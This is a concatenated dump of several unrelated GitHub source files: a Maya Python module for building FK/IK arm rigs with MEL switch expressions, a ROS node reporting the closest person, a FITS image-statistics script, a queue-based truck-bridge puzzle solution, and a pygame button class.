self.FKArmJoint = []\n        if LR == 1:self.LeftRight = [\"Left\"]\n        elif LR == 2:self.LeftRight = [\"Right\"]\n        self.dupArmJointList = self.System.dupRenameJoint(self.System.getJointLabelType()[LR,9],\"FK\")\n        for dupArmJointLists in reversed(self.dupArmJointList):\n            if dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,12]:\n                cmds.parent(dupArmJointLists,self.System.getJointLabelType()[LR,9])\n                self.FKArmJoint.append(dupArmJointLists)\n            elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,11]:\n                cmds.parent(dupArmJointLists,self.System.getJointLabelType()[LR,9])\n                self.FKArmJoint.append(dupArmJointLists)\n            elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,10]:\n                self.FKArmJoint.append(dupArmJointLists)\n            elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,9]:\n                self.FKArmJoint.append(dupArmJointLists)\n            else:cmds.delete(dupArmJointLists)\n        #reversed(self.FKArmJoint)\n        cmds.parent(self.FKArmJoint[0],self.FKArmJoint[1])\n        cmds.parent(self.FKArmJoint[1],self.FKArmJoint[2])\n\n        self.FKArmJointOC = cmds.orientConstraint(self.FKArmJoint[2],self.System.getJointLabelType()[LR,10],w=0,mo=True)\n        self.FKForeArmJointOC = cmds.orientConstraint(self.FKArmJoint[1],self.System.getJointLabelType()[LR,11],w=0,mo=True)\n        if LR == 1:\n            self.FKHandJointOC = cmds.orientConstraint(self.FKArmJoint[0],self.System.getJointLabelType()[LR,12],w=0,mo=True)\n        elif LR == 2:\n            self.FKHandJointOC = cmds.orientConstraint(self.FKArmJoint[0],self.System.getJointLabelType()[LR,12],w=0,o=[180,0,0])\n        self.FKShoulderJOffGP = self.System.createGP(self.FKArmJoint[-1],\"%s_Offset\"%self.FKArmJoint[-1])\n        cmds.parent(self.FKShoulderJOffGP,w=True)\n        #cmds.setAttr(self.FKArmOffGP+\".visibility\",0)\n\n        \"\"\"\n        self.FKJoint = []#Get the FK joints\n        if LR == 1:self.LeftRight = [\"Left\"]\n        elif LR == 2:self.LeftRight = [\"Right\"]\n        cmds.select(self.getJointLabelType()[LR,9])\n\n        self.FKArmJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,10]),n=\"FK%s\"%self.getJointLabelType()[LR,10])\n        self.FKForeArmJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,11]),n=\"FK%s\"%self.getJointLabelType()[LR,11])\n        #cmds.setAttr(self.FKForeArmJ+\".preferredAngleY\",-90)\n        self.pc = cmds.pointConstraint(self.getJointLabelType()[LR,11],self.FKForeArmJ)\n        cmds.delete(self.pc)\n        self.FKHandJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,12]),n=\"FK%s\"%self.getJointLabelType()[LR,12])\n        self.pc = cmds.pointConstraint(self.getJointLabelType()[LR,12],self.FKHandJ)\n        cmds.delete(self.pc)\n        self.FKArmJointOC = cmds.orientConstraint(self.FKArmJ,self.getJointLabelType()[LR,10],w=0,mo=True)\n        self.FKForeArmJointOC = cmds.orientConstraint(self.FKForeArmJ,self.getJointLabelType()[LR,11],w=0,mo=True)\n        self.FKHandJointOC = cmds.orientConstraint(self.FKHandJ,self.getJointLabelType()[LR,12],w=0,mo=True)\n        self.FKArmOffGP = self.createGP(self.FKArmJ,\"%s_Offset\"%self.FKArmJ)\n        cmds.setAttr(self.FKArmOffGP+\".visibility\",0)\n        \"\"\"\n\n    #Create the IK joints\n    def createIKArmJoint(self,LR,CtlColor):\n        cmds.select(self.System.getJointLabelType()[LR,9])\n        self.IKArmJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,10]),n=\"IK%s\"%self.System.getJointLabelType()[LR,10])\n        self.IKForeArmJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,11]),n=\"IK%s\"%self.System.getJointLabelType()[LR,11])\n        cmds.setAttr(self.IKForeArmJ+\".preferredAngleY\",-90)\n        self.pc = cmds.pointConstraint(self.System.getJointLabelType()[LR,11],self.IKForeArmJ)\n        cmds.delete(self.pc)\n        self.IKHandJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,12]),n=\"IK%s\"%self.System.getJointLabelType()[LR,12])\n        self.pc = cmds.pointConstraint(self.System.getJointLabelType()[LR,12],self.IKHandJ)\n        cmds.delete(self.pc)\n        self.IKArmJointOC = cmds.orientConstraint(self.IKArmJ,self.System.getJointLabelType()[LR,10],mo=True)\n        self.IKForeArmJointOC = cmds.orientConstraint(self.IKForeArmJ,self.System.getJointLabelType()[LR,11],mo=True)\n        if LR == 1:\n            self.IKHandJointOC = cmds.orientConstraint(self.IKHandJ,self.System.getJointLabelType()[LR,12],mo=True)\n        elif LR == 2:\n            self.IKHandJointOC = cmds.orientConstraint(self.IKHandJ,self.System.getJointLabelType()[LR,12],o=[180,0,0])\n        self.IKArmOffGP = self.System.createGP(self.IKArmJ,\"%s_Offset\"%self.IKArmJ)\n        cmds.parentConstraint(self.System.getJointLabelType()[LR,9],self.IKArmOffGP,mo=True)\n        cmds.setAttr(self.IKArmOffGP+\".visibility\",0)\n\n    #Create the IK controllers\n    def createIKArmCtl(self,LR,CtlColor):\n        self.armIK = cmds.ikHandle(sj = self.IKArmJ,ee = self.IKHandJ,\n                                   sol=\"ikRPsolver\",name=\"%s_ikHandle\"%self.System.getJointLabelType()[LR,12])\n        self.armIKGP = self.System.createGP(self.armIK[0],\"%s_GP\"%self.armIK[0])\n        cmds.setAttr(self.armIKGP+\".visibility\",0)\n        #IK hand controller\n        self.IKArmCtl = self.System.createRigController(self.System.TDcrc.TDCube,self.IKHandJ,self.System.getJointLabelType()[LR,12],CtlColor,15)\n        self.IKArmCtlPC = cmds.pointConstraint(self.IKArmCtl,self.System.gp)\n        self.IKArmCtlOC = cmds.orientConstraint(self.IKArmCtl,self.IKHandJ,mo=True)\n        self.IKArmCtlBlend = self.System.createGP(self.IKArmCtl,\"%s_Blend\"%self.IKArmCtl)\n\n        return self.armIKGP\n\n    #IK elbow controller\n    def createIKForeArmCtl(self,LR,CtlColor):\n        self.IKForeArmCtl = self.System.createRigController(self.System.TDcrc.TDsphere,self.IKForeArmJ,self.System.getJointLabelType()[LR,9],CtlColor,1)\n        self.getPivot = cmds.xform(self.System.getJointLabelType()[LR,11],q=True,ws=True,rp=True)\n        cmds.xform(self.IKForeArmCtl,ws=True,piv = self.getPivot)\n        if LR == 1:cmds.setAttr(self.IKForeArmCtl+\".rotateY\",-90)\n        else:cmds.setAttr(self.IKForeArmCtl+\".rotateY\",90)\n        cmds.makeIdentity(self.IKForeArmCtl,apply=True,t=1,r=1,s=1)\n        cmds.xform(self.IKForeArmCtl,cp=True)\n        cmds.poleVectorConstraint(self.IKForeArmCtl,self.armIK[0],w=1)\n        self.IKForeArmCtlBlend = self.System.createGP(self.IKForeArmCtl,\"%s_Blend\"%self.IKForeArmCtl)\n        #cmds.aimConstraint(self.getJointLabelType()[LR,11],self.IKForeArmCtl,o=[0,90,0])\n\n    #IK clavicle controller\n    def createIKShoulderCtl(self,LR,CtlColor):\n        self.shoulderCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.System.getJointLabelType()[LR,9],self.System.getJointLabelType()[LR,9],CtlColor,15)\n        if LR == 1:\n            cmds.setAttr(self.shoulderCtl+\".rotateZ\",70)\n        else:\n            cmds.setAttr(self.shoulderCtl+\".rotateZ\",-70)\n        cmds.makeIdentity(self.shoulderCtl,apply=True,t=1,r=1,s=1)\n        self.shoulderCtlpp = cmds.parentConstraint(self.shoulderCtl,self.System.getJointLabelType()[LR,9],mo=True)\n        self.shoulderCtlOffset = self.System.createGP(self.shoulderCtl,\"%s_Offset\"%self.shoulderCtl)\n\n    #Create the FK controllers\n    def createFKArmCtl(self,CtlColor):\n        \"Clavicle controller\"\n        cmds.parent(self.shoulderCtlOffset,self.FKArmJoint[-1])\n        cmds.makeIdentity(self.shoulderCtlOffset,apply=True,r=1)\n        \"Shoulder controller\"\n        self.FKArmCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[2],self.FKArmJoint[2],CtlColor,15)\n        cmds.setAttr(self.FKArmCtl+\".rotateZ\",90)\n        cmds.makeIdentity(self.FKArmCtl,apply=True,t=1,r=1,s=1)\n        self.FKArmCtlBlend = self.System.createGP(self.FKArmCtl,\"%s_Offset\"%self.FKArmCtl)\n\n        cmds.parent(self.FKArmCtlBlend,self.shoulderCtl)\n        cmds.makeIdentity(self.FKArmCtlBlend,apply=True,r=1)\n\n        self.FKArmJointRotate = self.System.createGP(self.FKArmCtlBlend,\"%s_ArmJointRotate\"%self.FKArmCtlBlend)\n        self.FKArmGP = cmds.group(self.FKArmJointRotate,name=\"FK%sArm_GP\"%self.LeftRight[0])\n\n        cmds.parent(self.FKArmJoint[2],self.FKArmCtl)\n        cmds.makeIdentity(self.FKArmCtl,apply=True,r=1)\n        #self.FKArmCtlop = cmds.orientConstraint(self.FKArmCtl,self.FKArmJoint[2],mo=True)\n        \"Elbow controller\"\n        self.FKForeArmCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[1],self.FKArmJoint[1],CtlColor,15)\n        cmds.setAttr(self.FKForeArmCtl+\".rotateZ\",90)\n        cmds.makeIdentity(self.FKForeArmCtl,apply=True,t=1,r=1,s=1)\n        self.FKForeArmCtlBlend = self.System.createGP(self.FKForeArmCtl,\"%s_Offset\"%self.FKForeArmCtl)\n\n        cmds.parent(self.FKForeArmCtlBlend,self.FKArmJoint[2])\n        cmds.makeIdentity(self.FKForeArmCtlBlend,apply=True,r=1)\n        cmds.parent(self.FKArmJoint[1],self.FKForeArmCtl)\n        #self.FKForeArmCtlop = cmds.orientConstraint(self.FKForeArmCtl,self.FKArmJoint[1],mo=True)\n        \"Hand controller\"\n        self.FKHandCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[0],self.FKArmJoint[0],CtlColor,15)\n        self.IKArmCtlOCAttr = cmds.getAttr(self.IKArmCtlOC[0]+\".offset\")\n        cmds.setAttr(self.FKHandCtl+\".rotateZ\",90)\n        self.FKHandCtlBlend = self.System.createGP(self.FKHandCtl,\"%s_Offset\"%self.FKHandCtl)\n\n        cmds.parent(self.FKHandCtlBlend,self.FKArmJoint[1])\n        cmds.makeIdentity(self.FKHandCtl,apply=True,t=1,r=1,s=1)\n        
cmds.parent(self.FKArmJoint[0],self.FKHandCtl)\n        #cmds.makeIdentity(self.FKHandCtl,apply=True,r=1)\n        #self.FKHandCtlop = cmds.orientConstraint(self.FKHandCtl,self.FKArmJoint[0],o=self.IKArmCtlOCAttr[0])\n        \"Create the offset nulls\"\n        cmds.makeIdentity(self.FKArmCtl,apply=True,r=1)\n\n        \"Parent the FK joints and controllers into a hierarchy\"\n\n        \"Locator that stores the FK wrist's world rotation values\"\n        self.FKHandRotLoc = cmds.spaceLocator(n=\"%s_RotateLocator\"%self.FKHandCtl)\n        self.pc = cmds.pointConstraint(self.FKHandCtl,self.FKHandRotLoc)\n        cmds.delete(self.pc)\n        cmds.parentConstraint(self.FKHandCtl,self.FKHandRotLoc)\n\n    #Create a seamless FK/IK switch expression\n    def createIKArmExpression(self,LR,switchCtlName):\n        if LR == 1:LR = \"Left\"\n        elif LR == 2:LR = \"Right\"\n        if LR == \"Left\":\n            self.ArmExpression = cmds.expression(n=\"%sFKArm_Expression\"%LR,ae=0,\\\n            s=u'/*Connect the values*/\\\\n'\n            +'undoInfo -ock;\\\\n'\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n'%(self.IKArmJointOC[0],self.IKArmJ,switchCtlName,LR)\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n'%(self.IKForeArmJointOC[0],self.IKForeArmJ,switchCtlName,LR)\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n\\\\n'%(self.IKHandJointOC[0],self.IKHandJ,switchCtlName,LR)\n\n            +'if(%s.%sArm_IK_FK == 1){\\\\n'%(switchCtlName,LR)\n            +u'/*Get the joint vector values*/\\\\n'\n            +'vector $FKWpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[0]\n            +'vector $FKEpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[1]\n            +'vector $FKSpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[2]\n            +'vector $IKHand = `xform -q -ws -rp %s`;\\\\n'%self.IKArmCtlBlend\n            +'vector $IKForeArm = `xform -q -ws -rp %s`;\\\\n'%self.IKForeArmCtlBlend\n            +'vector $FKWrot = `getAttr \"%s.rotate\"`;\\\\n'%self.FKHandCtl\n            +'vector $IKHandPos = $FKWpos - $IKHand;\\\\n\\\\n'\n\n            +u'/*Move the hand IK controller to the FK hand joint position*/\\\\n'\n            +'setAttr \"%s.translate\" ($IKHandPos.x)($IKHandPos.y)($IKHandPos.z);\\\\n'%self.IKArmCtl\n            +'//string $pointC[] = `pointConstraint %s %s`;\\\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n            +'//string $orientC[] = `orientConstraint %s %s`;\\\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n            +'vector $IKHandRot = `getAttr \"%s.rotate\"`;\\\\n'%self.FKHandRotLoc[0]\n            +'//delete $orientC;\\\\n'\n            +'setAttr \"%s.rotate\" ($IKHandRot.x)($IKHandRot.y)($IKHandRot.z);\\\\n\\\\n'%self.IKArmCtl\n\n            +u'/*Vector calculations*/\\\\n'\n            +'vector $midp = ($FKWpos + $FKSpos)/2;\\\\n'\n            +'vector $PVpos = $FKEpos - $midp;\\\\n'\n            +'vector $polePos = 5*$PVpos + $midp;\\\\n'\n            +'vector $IKForeArmPos = $polePos - $IKForeArm;\\\\n\\\\n'\n\n            +u'/*Move the elbow IK controller to the computed vector position*/\\\\n'\n            +'setAttr \"%s.translate\" ($IKForeArmPos.x)($IKForeArmPos.y)($IKForeArmPos.z);\\\\n'%self.IKForeArmCtl\n            #+'select %s;\\\\n'%self.SwitchCtl\n            +'}\\\\n\\\\n'\n\n            +'else if(%s.%sArm_IK_FK == 0){\\\\n'%(switchCtlName,LR)\n            +'vector $IKWpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKHandJ\n            +'vector $IKEpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKForeArmJ\n            +'vector $IKSpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKArmJ\n            +'vector $ArmJointRotate = `getAttr \"%s.rotate\"`;\\\\n\\\\n'%self.FKArmJointRotate\n\n            +'setAttr \"%s.rotate\" ($IKSpos.x - $ArmJointRotate.x)($IKSpos.y - $ArmJointRotate.y)($IKSpos.z - $ArmJointRotate.z);\\\\n'%self.FKArmCtl\n            +'setAttr \"%s.rotate\" ($IKEpos.x)($IKEpos.y)($IKEpos.z);\\\\n'%self.FKForeArmCtl\n            +'setAttr \"%s.rotate\" ($IKWpos.x)($IKWpos.y)($IKWpos.z);\\\\n'%self.FKHandCtl\n            +'}\\\\n'\n            +'undoInfo -cck;\\\\n')\n        elif LR == \"Right\":\n            self.ArmExpression = cmds.expression(n=\"%sFKArm_Expression\"%LR,ae=0,\\\n            s=u'/*Connect the values*/\\\\n'\n            +'undoInfo -ock;\\\\n'\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n'%(self.IKArmJointOC[0],self.IKArmJ,switchCtlName,LR)\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n'%(self.IKForeArmJointOC[0],self.IKForeArmJ,switchCtlName,LR)\n            +'%s.%sW1 = %s.%sArm_IK_FK;\\\\n\\\\n'%(self.IKHandJointOC[0],self.IKHandJ,switchCtlName,LR)\n\n            +'if(%s.%sArm_IK_FK == 1){\\\\n'%(switchCtlName,LR)\n            +u'/*Get the joint vector values*/\\\\n'\n            +'vector $FKWpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[0]\n            +'vector $FKEpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[1]\n            +'vector $FKSpos = `xform -q -ws -t %s`;\\\\n'%self.FKArmJoint[2]\n            +'vector $IKHand = `xform -q -ws -rp %s`;\\\\n'%self.IKArmCtlBlend\n            +'vector $IKForeArm = `xform -q -ws -rp %s`;\\\\n'%self.IKForeArmCtlBlend\n            +'vector $FKWrot = `getAttr \"%s.rotate\"`;\\\\n'%self.FKHandCtl\n            +'vector $IKHandPos = $FKWpos - $IKHand;\\\\n\\\\n'\n\n            +u'/*Move the hand IK controller to the FK hand joint position*/\\\\n'\n            +'setAttr \"%s.translate\" ($IKHandPos.x)($IKHandPos.y)($IKHandPos.z);\\\\n'%self.IKArmCtl\n            +'//string $pointC[] = `pointConstraint %s %s`;\\\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n            +'//string $orientC[] = `orientConstraint %s %s`;\\\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n            +'vector $IKHandRot = `getAttr \"%s.rotate\"`;\\\\n'%self.FKHandRotLoc[0]\n            +'//delete $orientC;\\\\n'\n            +'setAttr \"%s.rotate\" ($IKHandRot.x)($IKHandRot.y)($IKHandRot.z);\\\\n\\\\n'%self.IKArmCtl\n\n            +u'/*Vector calculations*/\\\\n'\n            +'vector $midp = ($FKWpos + $FKSpos)/2;\\\\n'\n            +'vector $PVpos = $FKEpos - $midp;\\\\n'\n            +'vector $polePos = 5*$PVpos + $midp;\\\\n'\n            +'vector $IKForeArmPos = $polePos - $IKForeArm;\\\\n\\\\n'\n\n            +u'/*Move the elbow IK controller to the computed vector position*/\\\\n'\n            +'setAttr \"%s.translate\" ($IKForeArmPos.x)($IKForeArmPos.y)($IKForeArmPos.z);\\\\n'%self.IKForeArmCtl\n            #+'select %s;\\\\n'%self.SwitchCtl\n            +'}\\\\n\\\\n'\n\n            +'else if(%s.%sArm_IK_FK == 0){\\\\n'%(switchCtlName,LR)\n            +'vector $IKWpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKHandJ\n            +'vector $IKEpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKForeArmJ\n            +'vector $IKSpos = `getAttr \"%s.rotate\"`;\\\\n'%self.IKArmJ\n            +'vector $ArmJointRotate = `getAttr \"%s.rotate\"`;\\\\n\\\\n'%self.FKArmJointRotate\n\n            +'setAttr \"%s.rotate\" ($IKSpos.x - $ArmJointRotate.x)(($IKSpos.y - $ArmJointRotate.y)* -1)(($IKSpos.z - $ArmJointRotate.z)* -1);\\\\n'%self.FKArmCtl\n            +'setAttr \"%s.rotate\" ($IKEpos.x)($IKEpos.y * -1)($IKEpos.z * -1);\\\\n'%self.FKForeArmCtl\n            +'setAttr \"%s.rotate\" ($IKWpos.x)($IKWpos.y * -1)($IKWpos.z * -1);\\\\n'%self.FKHandCtl\n            +'}\\\\n'\n            +'undoInfo -cck;\\\\n')\n        cmds.setAttr(self.IKForeArmCtl+\".translate\",0,0,0)\n\n    #Split the arm controllers into hierarchy groups\n    def setArmCtlLayering(self):\n        self.IKArmGP = cmds.group(self.IKForeArmCtlBlend,self.IKArmCtlBlend,name=\"IK%sArm_GP\"%self.LeftRight[0])\n        self.IKArmJointRotate = cmds.group(self.IKForeArmCtlBlend,self.IKArmCtlBlend,name=\"IK%sArm_ArmJointRotate\"%self.LeftRight[0])\n        self.ArmGP = cmds.group(self.FKShoulderJOffGP,name=\"%sArm_GP\"%self.LeftRight[0])\n        cmds.xform(self.ArmGP,ws=True,piv = cmds.xform(self.FKArmJoint[-1],q=True,ws=True,rp=True))\n\n        #cmds.makeIdentity(self.shoulderCtlOffset,apply=True,r=True)\n        cmds.parent(self.IKArmGP,self.ArmGP)\n\n        return self.ArmGP\n\n    #Set the arm's default rotation values\n    def setDefaultRotateAttr(self,LR):\n        self.getShoulderPivot = cmds.xform(self.System.getJointLabelType()[LR,10],q=True,ws=True,rp=True)\n        cmds.xform(self.IKArmJointRotate,ws=True,piv = self.getShoulderPivot)\n        cmds.setAttr(self.IKArmJointRotate+\".rotate\",*self.armRotateAttr[self.System.getJointLabelType()[LR,10]])\n        cmds.setAttr(self.FKArmJointRotate+\".rotate\",*self.armRotateAttr[self.System.getJointLabelType()[LR,10]])\n\n    #Arm FK/IK switch connections\n    def connectArmSwitch(self,LR,ArmAttrList):\n        if LR == 1:self.LeftRight = ArmAttrList\n        elif LR == 2:self.LeftRight = ArmAttrList\n        \"Shoulder switching\"\n        self.reverse = 
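The MEL expressions above place the elbow pole vector by taking the midpoint of the shoulder-wrist chord and pushing it out through the elbow (`$polePos = 5*$PVpos + $midp`). The same arithmetic in plain Python with hypothetical coordinates, no Maya required:

```python
# The pole-vector placement math embedded in the MEL expressions above,
# restated with plain tuples. Coordinates below are hypothetical.
def pole_vector(shoulder, elbow, wrist, scale=5.0):
    mid = tuple((s + w) / 2.0 for s, w in zip(shoulder, wrist))
    away = tuple(e - m for e, m in zip(elbow, mid))          # elbow offset from the chord
    return tuple(m + scale * a for m, a in zip(mid, away))   # polePos = 5*PVpos + midp

shoulder, elbow, wrist = (0.0, 10.0, 0.0), (2.0, 5.0, 1.0), (0.0, 0.0, 0.0)
print(pole_vector(shoulder, elbow, wrist))  # -> (10.0, 5.0, 5.0)
```

Scaling the offset by 5 keeps the pole target well clear of the joint chain, so the IK solver's elbow plane stays stable when the controllers are snapped during the FK-to-IK switch.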
cmds.shadingNode(\"reverse\",au=True,n=\"%s_reverse\"%self.FKArmJoint[2])\n #cmds.connectAttr(self.LeftRight,self.IKArmJointOC[0]+\".%sW1\"%self.IKArmJ,f=True)\n cmds.connectAttr(self.LeftRight,self.reverse+\".inputX\",f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKArmJointOC[0]+\".%sW0\"%self.FKArmJoint[2],f=True)\n \"肘のスイッチング\"\n #cmds.connectAttr(self.LeftRight,self.IKForeArmJointOC[0]+\".%sW1\"%self.IKForeArmJ,f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKForeArmJointOC[0]+\".%sW0\"%self.FKArmJoint[1],f=True)\n \"手のスイッチング\"\n #cmds.connectAttr(self.LeftRight,self.IKHandJointOC[0]+\".%sW1\"%self.IKHandJ,f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKHandJointOC[0]+\".%sW0\"%self.FKArmJoint[0],f=True)\n\n cmds.connectAttr(self.LeftRight,self.IKArmGP+\".visibility\",f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKArmGP+\".visibility\",f=True)\n\n #階層クラスに腕コントローラー\n def addArmCtlClass(self,LR):\n if LR == 1: TDCtlLayering.LeftArmIKGP = self.armIKGP\n elif LR == 2:TDCtlLayering.RightArmIKGP = self.armIKGP\n if LR == 1: TDCtlLayering.LeftArmGP = self.ArmGP\n elif LR == 2:TDCtlLayering.RightArmGP = self.ArmGP\n","repo_name":"pranawpradhan/TDModularRiggingSystem","sub_path":"modules/Arm.py","file_name":"Arm.py","file_ext":"py","file_size_in_byte":22086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16648132219","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom jedi.msg import PersonDistance\n\n\n\n\ndef distance (x1, y1, x2, y2):\n\txd = x1 -x2\n\tyd = y1 - y2\n\treturn math.sqrt(xd*xd + yd*yd)\n\nclass PersonMonitor(object):\n\tdef __init__(self, pub, people):\n\t\tself._pub = pub\n\t\tself._people = people\n\n\n\tdef callback(self, msg): \n\t\tx = msg.pose.pose.position.x\n\t\ty = msg.pose.pose.position.y\n\t\tclosest_name = None\n\t\tclosest_distance = None\n\t\tfor l_name, l_x, l_y in self._people:\n\t\t\tdist = distance(x,y, l_x, l_y)\n\t\t\tif closest_distance is None or dist < closest_distance:\n\t\t\t\tclosest_name\t= l_name\n\t\t\t\tclosest_distance = dist\n\t\tld = PersonDistance()\n\t\tld.name = closest_name\n\t\tld.distance = closest_distance\n\t\tself._pub.publish(ld)\t\t\n\t\t#rospy.loginfo('closest: {}'.format(closest_name))\n\t#do something with closest\n\n#rospy.loginfo('x: {}, y: {}'.format(x,y))\ndef main():\n\n\trospy.init_node('closest_person_node')\n\tpeople = []\n\t\n\tpeople.append((\"Person1\", -1.36, 6.3)); #Pessoa da sala inferior direita\n\tpeople.append((\"Person2\", 2.58, -1.07)); #Pessoa da sala superior direita\n\tpeople.append((\"Person3\", 2.31, 8.80)); #Pessoa na sala da esquerda\n\tpeople.append((\"Person4\", 3.12, 5.56)); #Pessoa da sala do meio superior\n\tpub = rospy.Publisher('closest_person', PersonDistance, queue_size=10)\n\tmonitor = PersonMonitor (pub, people)\n\t\n\trospy.Subscriber(\"/amcl_pose\", PoseWithCovarianceStamped, monitor.callback)\n\trospy.spin()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"gasj3/jedi","sub_path":"scripts/closest_person_node.py","file_name":"closest_person_node.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29873463418","text":"#!/usr/bin/python\n\nimport os, string\nimport numpy as np\nimport sys\n\nfrom astropy.io import fits\n\n# this script reads in fits image files and writes output giving statistics \n# about the 
image\n\n# get fits files\nfilenames = os.listdir(os.curdir)\nfor i in range(len(filenames)):\n#   if '.FITS' in filenames[i] and '-2l_10' in filenames[i]:\n   if '.fits' in filenames[i]: \n    fitsimage = filenames[i]\n    img = fits.getdata(fitsimage, ext=0)\n\n    mindata=np.amin(img)\n    maxdata=np.amax(img)\n\n    minlocation=np.where(img==mindata)\n    maxlocation=np.where(img==maxdata)\n# Content: minlocation[1] is array of x-coordinates where min occurs\n# Content: minlocation[0] is array of y-coordinates where min occurs\n# Content: minlocation[1][0] is the x-coordinate of the first occurrence of min\n# Content: minlocation[1][1] is the x-coordinate of the second occurrence of min\n\n    sigma=np.std(img)\n\n# If more than one occurrence of min or max, print warning and list the number of occurrences.\n    if (len(minlocation[0])>1):\n      print('# ',fitsimage,len(minlocation[0]),' pixels at minimum ',mindata)\n\n    if (len(maxlocation[0])>1):\n      print('# ',fitsimage,len(maxlocation[0]),' pixels at maximum ',maxdata)\n\n    if ((len(minlocation[0])==1) and (len(maxlocation[0])==1)):\n      #print mindata,minlocation[0][0],len(minlocation[0])\n      #print maxdata,maxlocation[0][0],\n      print(\"%35s %10.4e %15.10e %5d %5d %15.10e %5d %5d %10.4e \" % (fitsimage,sigma,mindata,minlocation[1][0],minlocation[0][0],maxdata,maxlocation[1][0],maxlocation[0][0],((maxdata-mindata)/sigma)))\n\n\n","repo_name":"twillis449/SKA-simulations","sub_path":"imstat_all.py","file_name":"imstat_all.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15421532640","text":"# Baekjoon - Truck - 13335 - implementation, queue, simulation problem\n'''\nImplementation, queue, simulation problem\n\nThis is the same problem as the Programmers problem called 'Trucks Crossing a Bridge'.\n\nSolution steps\n1. Create a list variable named temp_list to track the trucks currently crossing the bridge.\n2. Run a for loop, taking the truck weights given as the problem input one by one.\n3. Inside the for loop, use a while loop: if there is no truck on the bridge (temp_list is empty), add the truck.\n 3.1 - If the len of temp_list equals the bridge length (w), pop the first truck from temp_list.\n 3.2 - If the total sum of temp_list would exceed the bridge's maximum load, add 1 to the time (res) and append 0 to temp_list.\n 3.3 - Otherwise, append i to temp_list (the trucks crossing the bridge) and add 1 to res.\n4. Finally, when printing res, the full bridge length w must be added before printing.\n'''\n\nn, w, l = map(int, input().split())\nn_list = list(map(int, input().split()))\n\n# test cases\n# n, w, l = 4, 2, 10\n# n_list = [7,4,5,6] # 8\n# n, w, l = 1, 100, 100\n# n_list = [10] # 101\n# n, w, l = 10, 100, 100\n# n_list = [10,10,10,10,10,10,10,10,10,10] # 110\n\nres = 0\ntemp_list = []\n\nfor i in n_list:\n    while 1:\n        if not temp_list:\n            temp_list.append(i)\n            res += 1\n            break\n        elif len(temp_list) == w:\n            temp_list.pop(0)\n        else:\n            if sum(temp_list) + i > l:\n                res += 1\n                temp_list.append(0)\n            else:\n                temp_list.append(i)\n                res += 1\n                break\n\nprint(res + w)\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_1/트럭_13335.py","file_name":"트럭_13335.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34780539903","text":"import pygame\n\n\nclass Button(pygame.sprite.Sprite):\n    image_path = {\n        \"default\": \"graphics/new_game_btn.png\",\n        \"hover\": \"graphics/new_game_btn_hover.png\",\n    }\n\n    def __init__(self, game, pos, groups):\n        super().__init__(groups)\n        self.game = game\n        self.image = pygame.image.load(self.image_path[\"default\"]).convert_alpha()\n        self.rect = self.image.get_rect(topleft=pos)\n\n    def update(self):\n        if pygame.mouse.get_pressed()[0]:\n            if self.rect.collidepoint(pygame.mouse.get_pos()):\n                mouse_buttons_pressed = pygame.mouse.get_pressed()\n                if self.game.last_mouse_buttons != mouse_buttons_pressed:\n                    # left click\n                    if mouse_buttons_pressed[0]:\n                        self.game.reset()\n\n        if self.rect.collidepoint(pygame.mouse.get_pos()):\n            self.image = pygame.image.load(self.image_path[\"hover\"]).convert_alpha()\n        else:\n            self.image = pygame.image.load(self.image_path[\"default\"]).convert_alpha()\n","repo_name":"tom-orrow/swine-mapper","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} 